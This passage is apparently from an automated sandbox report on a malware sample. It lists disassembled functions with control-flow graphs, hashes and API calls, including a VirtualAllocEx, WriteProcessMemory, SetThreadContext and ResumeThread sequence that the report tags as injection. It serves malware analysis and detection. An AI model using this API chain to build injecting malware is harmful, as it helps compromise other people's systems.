280f550-280f57a 141->156 157 280f51b-280f54e 141->157 142->143 145 280f350-280f390 142->145 146 280f395-280f3d5 142->146 147 280f3da-280f41a 142->147 148 280f41f-280f45f 142->148 161 280f4a6 143->161 145->161 146->161 147->161 148->161 165 280f583-280f616 156->165 157->165 161->138 169 280f61d-280f63d 165->169 169->55
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2281821459.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2800000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: TJhq$Tecq$pgq$xbfq
                                                                                                  • API String ID: 0-3743893911
                                                                                                  • Opcode ID: 58bc72ee657b360abe183605404a6351ca26c67268fea22d8d46e0b7d7231667
                                                                                                  • Instruction ID: 814eb54744b8762f7e5d93b20e83851ba7f963b8a35579dc320b29311d0fc214
                                                                                                  • Opcode Fuzzy Hash: 58bc72ee657b360abe183605404a6351ca26c67268fea22d8d46e0b7d7231667
                                                                                                  • Instruction Fuzzy Hash: 26A2B775A00228CFDB64DF69C984A99BBB2FF89304F1581D9D50DAB365DB31AE81CF40
                                                                                                  Function 059D5190 Relevance: 3.1, Strings: 2, Instructions: 610COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 218 59d5190-59d51b1 219 59d51b8-59d5242 218->219 220 59d51b3 218->220 310 59d5248 call 59d5cd1 219->310 311 59d5248 call 59d5ce0 219->311 220->219 225 59d524e-59d528b 227 59d528d-59d5298 225->227 228 59d529a 225->228 229 59d52a4-59d53bf 227->229 228->229 240 59d53d1-59d53fc 229->240 241 59d53c1-59d53c7 229->241 242 59d5bb0-59d5bcc 240->242 241->240 243 59d5401-59d5430 242->243 244 59d5bd2-59d5bed 242->244 247 59d543a-59d5564 call 59d41e8 243->247 255 59d5576-59d56f3 247->255 256 59d5566-59d556c 247->256 266 59d5758-59d5762 255->266 267 59d56f5-59d56f9 255->267 256->255 270 59d5989-59d59a8 266->270 268 59d56fb-59d56fc 267->268 269 59d5701-59d5753 267->269 271 59d5a2e-59d5a99 268->271 269->271 272 59d59ae-59d59d8 270->272 273 59d5767-59d58ad call 59d41e8 270->273 290 59d5aab-59d5af6 271->290 291 59d5a9b-59d5aa1 271->291 279 59d5a2b-59d5a2c 272->279 280 59d59da-59d5a28 272->280 302 59d58b3-59d597f call 59d41e8 273->302 303 59d5982-59d5983 273->303 279->271 280->279 293 59d5afc-59d5b94 290->293 294 59d5b95-59d5bad 290->294 291->290 293->294 294->242 302->303 303->270 310->225 311->225
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: fhq$8
                                                                                                  • API String ID: 0-3528958667
                                                                                                  • Opcode ID: 0ce25dd8b05306e21784b6793cafb6c9fe7dee370e8821bc1c2c04cbbb2db756
                                                                                                  • Instruction ID: 7efaad0868efa24628eb57fb4807aed55ce409bbb20b29e72dd3f6c8d961695c
                                                                                                  • Opcode Fuzzy Hash: 0ce25dd8b05306e21784b6793cafb6c9fe7dee370e8821bc1c2c04cbbb2db756
                                                                                                  • Instruction Fuzzy Hash: 5952C375E052298FDB64DF68C890AD9B7B2FF89300F1081EAD909A7345DB30AE81CF50
                                                                                                  Function 059D5180 Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 312 59d5180-59d51b1 314 59d51b8-59d5242 312->314 315 59d51b3 312->315 405 59d5248 call 59d5cd1 314->405 406 59d5248 call 59d5ce0 314->406 315->314 320 59d524e-59d528b 322 59d528d-59d5298 320->322 323 59d529a 320->323 324 59d52a4-59d53bf 322->324 323->324 335 59d53d1-59d53fc 324->335 336 59d53c1-59d53c7 324->336 337 59d5bb0-59d5bcc 335->337 336->335 338 59d5401-59d5430 337->338 339 59d5bd2-59d5bed 337->339 342 59d543a-59d5564 call 59d41e8 338->342 350 59d5576-59d56f3 342->350 351 59d5566-59d556c 342->351 361 59d5758-59d5762 350->361 362 59d56f5-59d56f9 350->362 351->350 365 59d5989-59d59a8 361->365 363 59d56fb-59d56fc 362->363 364 59d5701-59d5753 362->364 366 59d5a2e-59d5a99 363->366 364->366 367 59d59ae-59d59d8 365->367 368 59d5767-59d58ad call 59d41e8 365->368 385 59d5aab-59d5af6 366->385 386 59d5a9b-59d5aa1 366->386 374 59d5a2b-59d5a2c 367->374 375 59d59da-59d5a28 367->375 397 59d58b3-59d597f call 59d41e8 368->397 398 59d5982-59d5983 368->398 374->366 375->374 388 59d5afc-59d5b94 385->388 389 59d5b95-59d5bad 385->389 386->385 388->389 389->337 397->398 398->365 405->320 406->320
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: fhq$h
                                                                                                  • API String ID: 0-3107779391
                                                                                                  • Opcode ID: 712182f68cf659ae2d6daa3fa2a421f76b4e54e8ec3eba70edbcfc6a13860d06
                                                                                                  • Instruction ID: 7c740f4a293422cb3ff4c9d2bcac8e2a2b7021bd8469d193672b1f074362f80d
                                                                                                  • Opcode Fuzzy Hash: 712182f68cf659ae2d6daa3fa2a421f76b4e54e8ec3eba70edbcfc6a13860d06
                                                                                                  • Instruction Fuzzy Hash: 55712771D052289FDB64DF69C850BDABBF2FF89300F1081AAD509B7244DB30AA85CF91
                                                                                                  Function 059D8490 Relevance: 1.6, APIs: 1, Instructions: 67nativeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 605 59d8490-59d852e NtProtectVirtualMemory 608 59d8537-59d855c 605->608 609 59d8530-59d8536 605->609 609->608
                                                                                                  APIs
                                                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 059D8521
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2706961497-0
                                                                                                  • Opcode ID: 552f728ca1e59e3469a492181a067fbe42da90030bbd093a3c63a3e468ac9236
                                                                                                  • Instruction ID: 86f110c036653fc92a1172ccd9250efb890690866b0b4936205dae661cc6526a
                                                                                                  • Opcode Fuzzy Hash: 552f728ca1e59e3469a492181a067fbe42da90030bbd093a3c63a3e468ac9236
                                                                                                  • Instruction Fuzzy Hash: 8621F0B1D003499FCB10DFAAD984ADEFBF5FF48310F20882AE459A7250D7759A41CBA1
                                                                                                  Function 059D8498 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 614 59d8498-59d852e NtProtectVirtualMemory 617 59d8537-59d855c 614->617 618 59d8530-59d8536 614->618 618->617
                                                                                                  APIs
                                                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 059D8521
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2706961497-0
                                                                                                  • Opcode ID: ec529d94a0ea963b7834594cab63aee6c3b9c2df5dabaf7a174557f81f4a98fd
                                                                                                  • Instruction ID: 42c207645128a2614b075e1c26f6f283fbe8cb4c89caf6f9262b48692d3bc09f
                                                                                                  • Opcode Fuzzy Hash: ec529d94a0ea963b7834594cab63aee6c3b9c2df5dabaf7a174557f81f4a98fd
                                                                                                  • Instruction Fuzzy Hash: C12114B1D003499FCB10DFAAD984ADEFBF5FF48310F20842AE419A7210C775A900CBA1
                                                                                                  Function 059DBDC0 Relevance: 1.6, APIs: 1, Instructions: 57nativethreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 059DBE36
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: 9e6a78aac14489bccd8e9cbba9235d8c653b931c8986d59e1968f306ae9e5227
                                                                                                  • Instruction ID: 953d838d6899e5285e39f2db0aa6ed8cc93a8eeb5ac270c1b1f40e9d7569a368
                                                                                                  • Opcode Fuzzy Hash: 9e6a78aac14489bccd8e9cbba9235d8c653b931c8986d59e1968f306ae9e5227
                                                                                                  • Instruction Fuzzy Hash: 1E1136B5D002498FCB20DFAAC4846AEFBF5FF88324F10842AD419A7200CB749945CFA1
                                                                                                  Function 059DBDC8 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 059DBE36
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: 07d5e9aadac0d5e9b9f07d8a66b829f1fcdfe8204e77cd37821f763b376e121b
                                                                                                  • Instruction ID: b10b248c4dc61c52979881e8063f841262bd2934c5abc0200df7d8b32c7c2860
                                                                                                  • Opcode Fuzzy Hash: 07d5e9aadac0d5e9b9f07d8a66b829f1fcdfe8204e77cd37821f763b376e121b
                                                                                                  • Instruction Fuzzy Hash: FB11E7B1D003498FDB10DFAAC445A9FFBF5EF89324F50842AD519A7250CB74A945CFA1
                                                                                                  Function 0719F608 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2316352420.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7180000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Djq
                                                                                                  • API String ID: 0-3204991199
                                                                                                  • Opcode ID: 3e850318c8a8fbc1957e9021f295dcd06589af40c8545ecc6f6cd72dc24d01b7
                                                                                                  • Instruction ID: c702d66516b7eaa68e1095fe2d56082888d85cdba1326db7622d7f89df115016
                                                                                                  • Opcode Fuzzy Hash: 3e850318c8a8fbc1957e9021f295dcd06589af40c8545ecc6f6cd72dc24d01b7
                                                                                                  • Instruction Fuzzy Hash: B5D1C5B4E00219DFDB54DFA9D994A9DBBB2FF89300F1080A9D409AB365DB319D86CF50
                                                                                                  Function 02800868 Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 407 2800868-280087a 408 2800882-2800892 407->408 436 280087c call 28009cc 407->436 411 2800894-280089a 408->411 412 280089b-28008b8 408->412 416 28008ca-28008d0 412->416 417 28008ba-28008c8 412->417 417->416 419 28008d1-2800924 417->419 423 2800926-2800935 419->423 424 280099c-28009af 419->424 428 2800937-280096b 423->428 429 280098b-280099a 423->429 425 28009b1 424->425 427 28009b2 425->427 427->427 435 2800971-2800984 428->435 429->423 429->424 435->425 436->408
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2281821459.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2800000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: <dzq$Ph
                                                                                                  • API String ID: 0-3385471347
                                                                                                  • Opcode ID: 62f2c1b6ba00ece9469ca2a09ac5dad89371fed631a31f68dde4f376eef6cf21
                                                                                                  • Instruction ID: ebb901123df86f9323e3ebf779100c0cbf601bdd71e429c47fc72db4d51a81e4
                                                                                                  • Opcode Fuzzy Hash: 62f2c1b6ba00ece9469ca2a09ac5dad89371fed631a31f68dde4f376eef6cf21
                                                                                                  • Instruction Fuzzy Hash: 2D419339F102098FDB48DF69D594BAEB7F2BF88715F104069E905EB3A0EB709C418B81
                                                                                                  Function 059D8E95 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 480 59d8e95-59d8e9d 481 59d8e9f-59d8f10 480->481 482 59d8e21-59d8e31 480->482 487 59d8f49-59d8f69 481->487 488 59d8f12-59d8f1c 481->488 484 59d8e38-59d8e43 482->484 486 59d8e4b-59d8e6d 484->486 489 59d8e6f-59d8e77 486->489 490 59d8df6-59d8dfc 486->490 500 59d8f6b-59d8f75 487->500 501 59d8fa2-59d8fdc 487->501 488->487 491 59d8f1e-59d8f20 488->491 489->490 492 59d8dfe 490->492 493 59d8e05-59d8e06 490->493 496 59d8f43-59d8f46 491->496 497 59d8f22-59d8f2c 491->497 492->493 494 59d8e08-59d8e10 492->494 498 59d8e14-59d8e2e 492->498 499 59d8e11-59d8e12 492->499 493->494 496->487 502 59d8f2e 497->502 503 59d8f30-59d8f3f 497->503 498->484 499->494 500->501 504 59d8f77-59d8f79 500->504 512 59d8fde-59d8fe8 501->512 513 59d9015-59d908a CreateProcessA 501->513 502->503 503->503 506 59d8f41 503->506 507 59d8f9c-59d8f9f 504->507 508 59d8f7b-59d8f85 504->508 506->496 507->501 510 59d8f89-59d8f98 508->510 511 59d8f87 508->511 510->510 514 59d8f9a 510->514 511->510 512->513 515 59d8fea-59d8fec 512->515 523 59d908c-59d9092 513->523 524 59d9093-59d90db 513->524 514->507 517 59d900f-59d9012 515->517 518 59d8fee-59d8ff8 515->518 517->513 519 59d8ffc-59d900b 518->519 520 59d8ffa 518->520 519->519 521 59d900d 519->521 520->519 521->517 523->524 529 59d90dd-59d90e1 524->529 530 59d90eb-59d90ef 524->530 529->530 531 59d90e3 529->531 532 59d90ff-59d9103 530->532 533 59d90f1-59d90f5 530->533 531->530 535 59d9105-59d9109 532->535 536 59d9113 532->536 533->532 534 59d90f7 533->534 534->532 535->536 537 59d910b 535->537 538 59d9114 536->538 537->536 538->538
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 059D907A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: 8a59eba8dc4e172ac1f1645a26800bef0ea2252dd193888f1987d86381959cfc
                                                                                                  • Instruction ID: c1da28f5d10df0ddbbb73b0e8ad86b88ee960d4c7e450ef916c75de41dfd0a73
                                                                                                  • Opcode Fuzzy Hash: 8a59eba8dc4e172ac1f1645a26800bef0ea2252dd193888f1987d86381959cfc
                                                                                                  • Instruction Fuzzy Hash: 3FA15771E002099FDB10DFA9D9857AEFBF2FB48310F148529E819E7285D7749882CFA1
                                                                                                  Function 059D8EA0 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 539 59d8ea0-59d8f10 541 59d8f49-59d8f69 539->541 542 59d8f12-59d8f1c 539->542 547 59d8f6b-59d8f75 541->547 548 59d8fa2-59d8fdc 541->548 542->541 543 59d8f1e-59d8f20 542->543 545 59d8f43-59d8f46 543->545 546 59d8f22-59d8f2c 543->546 545->541 549 59d8f2e 546->549 550 59d8f30-59d8f3f 546->550 547->548 551 59d8f77-59d8f79 547->551 558 59d8fde-59d8fe8 548->558 559 59d9015-59d908a CreateProcessA 548->559 549->550 550->550 552 59d8f41 550->552 553 59d8f9c-59d8f9f 551->553 554 59d8f7b-59d8f85 551->554 552->545 553->548 556 59d8f89-59d8f98 554->556 557 59d8f87 554->557 556->556 560 59d8f9a 556->560 557->556 558->559 561 59d8fea-59d8fec 558->561 569 59d908c-59d9092 559->569 570 59d9093-59d90db 559->570 560->553 563 59d900f-59d9012 561->563 564 59d8fee-59d8ff8 561->564 563->559 565 59d8ffc-59d900b 564->565 566 59d8ffa 564->566 565->565 567 59d900d 565->567 566->565 567->563 569->570 575 59d90dd-59d90e1 570->575 576 59d90eb-59d90ef 570->576 575->576 577 59d90e3 575->577 578 59d90ff-59d9103 576->578 579 59d90f1-59d90f5 576->579 577->576 581 59d9105-59d9109 578->581 582 59d9113 578->582 579->578 580 59d90f7 579->580 580->578 581->582 583 59d910b 581->583 584 59d9114 582->584 583->582 584->584
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 059D907A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: 4699b3c0f4b8a5967ac2757751fde81ad8e8224e99dec13a0e9a9bb90e86b846
                                                                                                  • Instruction ID: c091163d7cd0ab6f3d7ea331100c25366db240b20b8d943338ae4d6a3ec9a4c7
                                                                                                  • Opcode Fuzzy Hash: 4699b3c0f4b8a5967ac2757751fde81ad8e8224e99dec13a0e9a9bb90e86b846
                                                                                                  • Instruction Fuzzy Hash: 268125B1E002199FDB10DFA9C9857AEFBF6BF48310F148129E819EB295D7748881CF91
                                                                                                  Function 059DB7A8 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 585 59db7a8-59db7fe 587 59db80e-59db84d WriteProcessMemory 585->587 588 59db800-59db80c 585->588 590 59db84f-59db855 587->590 591 59db856-59db886 587->591 588->587 590->591
                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 059DB840
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: 4ffaa3204a103eb521acf4f0b5df28e3a9b2f5f6d50b30b93b848591aa28b2a8
                                                                                                  • Instruction ID: 3ff391f4ddc099cc6dc8eaffc56b94f8fa28f375f47109b0e6c30d4d8610f8cf
                                                                                                  • Opcode Fuzzy Hash: 4ffaa3204a103eb521acf4f0b5df28e3a9b2f5f6d50b30b93b848591aa28b2a8
                                                                                                  • Instruction Fuzzy Hash: 552104B6D003499FCB10CFA9C885ADEFBF5FF88310F10882AE559A7250C7789555CBA5
                                                                                                  Function 059DB7B0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 595 59db7b0-59db7fe 597 59db80e-59db84d WriteProcessMemory 595->597 598 59db800-59db80c 595->598 600 59db84f-59db855 597->600 601 59db856-59db886 597->601 598->597 600->601
                                                                                                  APIs
                                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 059DB840
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: 14cfc9b86f6535b2d2429f50650907d21b2fce8a0338968670d55c699996e921
                                                                                                  • Instruction ID: 50575e0c486d5a4dc5452e591f6dbdab42c4d46b6b1f4898758f81e3e5167c75
                                                                                                  • Opcode Fuzzy Hash: 14cfc9b86f6535b2d2429f50650907d21b2fce8a0338968670d55c699996e921
                                                                                                  • Instruction Fuzzy Hash: 152124B5D003499FCB10CFA9C885BEEBBF5FF88310F10842AE919A7240C7789944CBA5
                                                                                                  Function 059DAF98 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 059DB016
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: d5a3d507fea5b36d499ab53410d899b9d4a66ebc7f8b2c2761fefeba88c45f53
                                                                                                  • Instruction ID: 525a749ef35c5eb4ca6a0b295fea2df95b6476ba1fdf431fcda84fbd15a60d1b
                                                                                                  • Opcode Fuzzy Hash: d5a3d507fea5b36d499ab53410d899b9d4a66ebc7f8b2c2761fefeba88c45f53
                                                                                                  • Instruction Fuzzy Hash: 702107B1D003098FDB10DFAAC4857AEFBF5EB89324F548429D419A7240CB789945CFA1
                                                                                                  Function 059DAF90 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 623 59daf90-59dafe3 625 59dafe5-59daff1 623->625 626 59daff3-59db023 Wow64SetThreadContext 623->626 625->626 628 59db02c-59db05c 626->628 629 59db025-59db02b 626->629 629->628
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 059DB016
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: b0396ef4d3c5f990baa6609bdf1f22b452526156a5ae1e0945b68c01289c7542
                                                                                                  • Instruction ID: 1b20f5f278b322c10a63d72273238c3cb676bb1a08e69a9a2fe1c32884219836
                                                                                                  • Opcode Fuzzy Hash: b0396ef4d3c5f990baa6609bdf1f22b452526156a5ae1e0945b68c01289c7542
                                                                                                  • Instruction Fuzzy Hash: 8A214875D002498FDB10DFA9C4847EEFFF5AB89310F148429D469A7241C7789545CFA1
                                                                                                  Function 059DB538 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059DB5A6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 3e8084cfdac1c3128976ed42bea01c1edc3179e9a6a848f0936dfeaca646409c
                                                                                                  • Instruction ID: d229f3653a39fa10f9c3a99b831a72fea97d470262dd63f471006c97465c2238
                                                                                                  • Opcode Fuzzy Hash: 3e8084cfdac1c3128976ed42bea01c1edc3179e9a6a848f0936dfeaca646409c
                                                                                                  • Instruction Fuzzy Hash: 1B112676D002499FCB10DFAAC845ADFFFF5EB88320F108419E519A7250C775A944CFA1
                                                                                                  Function 059DB533 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 059DB5A6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: b595661c7a922743cd62d3909960cefd0a5753a2d2c5a464e3076f75d6bcfba8
                                                                                                  • Instruction ID: 066514fc808d7ac9e315cd32e7e57da84e8d004a488c37ee6d373c2fc269be60
                                                                                                  • Opcode Fuzzy Hash: b595661c7a922743cd62d3909960cefd0a5753a2d2c5a464e3076f75d6bcfba8
                                                                                                  • Instruction Fuzzy Hash: EB1144769002498FDB20DFA9C844BEEBFF5AF88320F148419E519A7250C775A544CFA1
                                                                                                  Function 028009CC Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2281821459.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2800000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: tohq
                                                                                                  • API String ID: 0-213173455
                                                                                                  • Opcode ID: 35c4fa191b01d430cd62ad12658500997437683e9779e72a183773dd05b6ca82
                                                                                                  • Instruction ID: e3fcdcbce35da3e6ba386319d3ce013fc0f86f98db0be19b85c2bda7adcd154d
                                                                                                  • Opcode Fuzzy Hash: 35c4fa191b01d430cd62ad12658500997437683e9779e72a183773dd05b6ca82
                                                                                                  • Instruction Fuzzy Hash: 8341AD357001049FCB05AB78D498BAE7BF2EF89710F244868E406EB3A5DF75AC46CB91
                                                                                                  Function 07180774 Relevance: 1.3, Strings: 1, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2316352420.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7180000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ~
                                                                                                  • API String ID: 0-1707062198
                                                                                                  • Opcode ID: 94e5358663568eea692415ca959550e327811b3e1c0c8d53a2a242839a705ea8
                                                                                                  • Instruction ID: 5737cb51ad5e25c4df88b04db1431562070cd1edf520d6dee91b2ebb5e5927dd
                                                                                                  • Opcode Fuzzy Hash: 94e5358663568eea692415ca959550e327811b3e1c0c8d53a2a242839a705ea8
